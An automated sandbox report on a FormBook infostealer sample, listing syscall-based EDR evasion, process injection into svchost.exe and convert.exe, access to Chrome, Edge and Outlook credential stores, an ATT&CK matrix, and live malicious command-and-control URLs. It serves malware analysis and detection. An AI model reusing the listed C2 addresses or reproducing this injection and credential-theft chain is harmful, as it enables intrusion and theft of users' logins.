            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]2_2_02F309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]2_2_02F309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]2_2_02FD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]2_2_02FD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC97C mov eax, dword ptr fs:[00000030h]2_2_02FBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]2_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]2_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]2_2_02F56962
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008681F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_008681F7
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0083A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0083A395
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0083A364 SetUnhandledExceptionFilter,1_2_0083A364

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtOpenKeyEx: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtQueryValueKey: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\convert.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: NULL target: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: NULL target: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\convert.exeThread register set: target process: 1088Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\convert.exeThread APC queued: target process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33D008Jump to behavior
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00868C93 LogonUserW,1_2_00868C93
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00813B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00813B4C
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00814A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00814A35
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00874EC9 mouse_event,1_2_00874EC9
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\hkLFB22XxS.exe"Jump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeProcess created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\convert.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008681F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_008681F7
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00874C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_00874C03
            Source: hkLFB22XxS.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000000.2493693247.0000000001141000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578331295.0000000001140000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000000.2637266429.00000000014F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: hkLFB22XxS.exe, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000000.2493693247.0000000001141000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578331295.0000000001140000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000000.2637266429.00000000014F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000000.2493693247.0000000001141000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578331295.0000000001140000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000000.2637266429.00000000014F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000000.2493693247.0000000001141000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578331295.0000000001140000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000000.2637266429.00000000014F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0083886B cpuid 1_2_0083886B
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008450D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_008450D7
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00852230 GetUserNameW,1_2_00852230
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0084418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_0084418A
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00814AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00814AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\convert.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: hkLFB22XxS.exeBinary or memory string: WIN_81
            Source: hkLFB22XxS.exeBinary or memory string: WIN_XP
            Source: hkLFB22XxS.exeBinary or memory string: WIN_XPe
            Source: hkLFB22XxS.exeBinary or memory string: WIN_VISTA
            Source: hkLFB22XxS.exeBinary or memory string: WIN_7
            Source: hkLFB22XxS.exeBinary or memory string: WIN_8
            Source: hkLFB22XxS.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00886596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00886596
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00886A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00886A5A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466070 Sample: hkLFB22XxS.exe Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 28 www.d99qtpkvavjj.xyz 2->28 30 www.cloudsoda.xyz 2->30 32 21 other IPs or domains 2->32 42 Snort IDS alert for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 5 other signatures 2->50 10 hkLFB22XxS.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 YcTurzUREEPNDwUlDlxzRT.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 convert.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 YcTurzUREEPNDwUlDlxzRT.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.firmshow.top 203.161.43.228, 49727, 49728, 49729 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 autonomyai.xyz 15.197.142.173, 49744, 49745, 49746 TANDEMUS United States 22->36 38 8 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            hkLFB22XxS.exe68%ReversingLabsWin32.Trojan.Leonem
            hkLFB22XxS.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.rebornqababy.ru/waey/100%Avira URL Cloudmalware
            http://www.cavetta.org.mt/yhnb/0%Avira URL Cloudsafe
            http://www.autonomyai.xyz/b2v9/?GBbljTO=0sOIBL6Y1M004sQ5TvZd5iz/+VJrlsE2TnBUG2Cle0uPodabdAFumCtHEYRGqgGZaXBiOoh6miWUokUDwH1uxZLkB2zaEttNK0EmqhWvcq3hRWFyql4+CgnPikYYPSDEc9yry/0=&mB=rL4lP100%Avira URL Cloudmalware
            http://www.erosonline.com.br/2lcx/100%Avira URL Cloudmalware
            http://www.faxinguxn6.cn/ofk1/0%Avira URL Cloudsafe
            https://login.live.c0%Avira URL Cloudsafe
            http://www.autonomyai.xyz/b2v9/100%Avira URL Cloudmalware
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.jl884.vip/r4wk/?mB=rL4lP&GBbljTO=x9GkKIHXkLsCiyVr8u8o1dWkHkpveCE8pq06snQr36Jjj9CRM0vMnoakwWLgrIMHyYBq6SPCqUTgPlgJ6rJOIdv2Hpbl0D0DeBG+01R28dU1nzrJm0yQzAnZDQ+iQUJ8Z49zmcM=0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
